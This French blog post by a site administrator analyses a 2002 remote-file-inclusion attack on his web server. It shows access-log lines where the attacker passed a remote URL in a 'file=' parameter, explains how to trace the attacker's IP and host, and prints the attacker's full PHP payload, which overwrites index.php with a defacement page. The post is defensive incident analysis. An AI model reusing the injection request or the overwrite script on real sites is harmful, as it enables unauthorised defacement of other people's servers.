Analyse d’un hacking

mercredi 22 avril 2009
par  Jerome ROBERT
popularité : 2%


Analyse d'un hacking ...



Analyse de votre fichier de log de votre serveur WEB:

grep 'file=http' access_log #nom de votre fichier de log

#2.147.105.2#8 - - [31/Dec/2002:14:11:18 +0100] "GET /linux/index.php?file=http://#####.sui#zer0.###/hack HTTP/1.1" 200 1430 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

#2.147.105.2#8 - - [31/Dec/2002:14:11:30 +0100] "GET / HTTP/1.1" 200 3869 "http://www.admin-sys.com/linux/index.php?file=http://#####.sui#zer0.###/hack" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"



Les # sont la pour respecter le hackeur ....



Analyse du résultat:

Nous avons @IP de la machine qui a servi a faire le hack: #2.147.105.2#8

Nous avons le site qui a aider a faire le hack: http://#####.sui#zer0.###/



Avec #2.147.105.2#8 et les outils qui se trouvent dans « http//:www.admin-sys.com/reseaux/outils/ » Et en choisissent « Qui est le propriétaire de cette Adresse IP » Cela va vous permet de trouver le propriétaire de l'adresse IP donc le « provider » ( free, aol, ... ), avec l'heure, il est possible de contacter le responsable technique ,pour que ce dernier recherche dans ces logs des compléments informations qui seront utiles lors de la procédure judiciaires. ( s'il y a eu de gros problèmes ...)

Avec http://#####.sui#zer0.###/ il est possible de connaître le responsable de ce domaine et demander des comptes sur l'un de ces comptes, car le site à pu être aussi pirater ...

Attention:

On peut obtenir beaucoup d'information, mais on ne sais pas si c'est vraiment le hackeur ou un pigeon (victime d'un piratage).... Surtout s'il vient d'une machine WINDOWS ....



Soyez très prudent est regarder vos LOGs .....



Voici les sources dans fichier de HACK ...

<?php echo "en cours...
"; $f = fopen("index.php", "w"); echo "Ouvert...
"; $data = "<?php if(\$rub){header(\"location: _index.php?rub=\".\$rub);exit;} ?>

      __   __  _______  ______  __   __    _______  _____        ____  __   __
     / /  / / / ___  / / ____/ / /  / /   / _____/ / ___ \      / __ \ | | / /
    / /__/ / / /__/ / / /     / /__/ /   / /___   / /  / /     / /_/ / | |/ /
   / ___  / / ___  / / /     / ___  <   / ____/  / /  / /     / __ <   |   /
  / /  / / / /  / / / /___  / /   | |  / /____  / /__/ /     / /_/ /   / /
 /_/  /_/ /_/  /_/ /_____/ /_/    |_| /______/ /______/     /_____/   /_/

#



Ce site n'est pas mal, sauf une ch'tite faille de sécurité à boucher...

Monsieur l'admin, voyez le mail que je vous ai envoyé pour les détails et la correction de la faille...

Sur ce, faites tous attention à la sécurité de vos serveurs et de vos réseaux, car il y aura toujours un hacker
pour trouver les failles de vos bécanes, et certains n'ont pas des intentions aussi bienvéillantes que les miennes ;)
On dit merci qui ? merci e ! ;o)

Par ici l'entrée... et bonne année !

e - le 31/12/2002 (oui je sais mon ASCII il est moche...)

"; echo "Pret à ecrire...
"; fputs($f, $data); echo "Ecrit...
"; fclose($f); echo "H@cked by e
"; ?>


Commentaires  Forum fermé

Navigation

Articles de la rubrique

Statistiques

Dernière mise à jour

mercredi 4 octobre 2023

Publication

273 Articles
Aucun album photo
Aucune brève
6 Sites Web
2 Auteurs

Visites

33 aujourd’hui
213 hier
864522 depuis le début
10 visiteurs actuellement connectés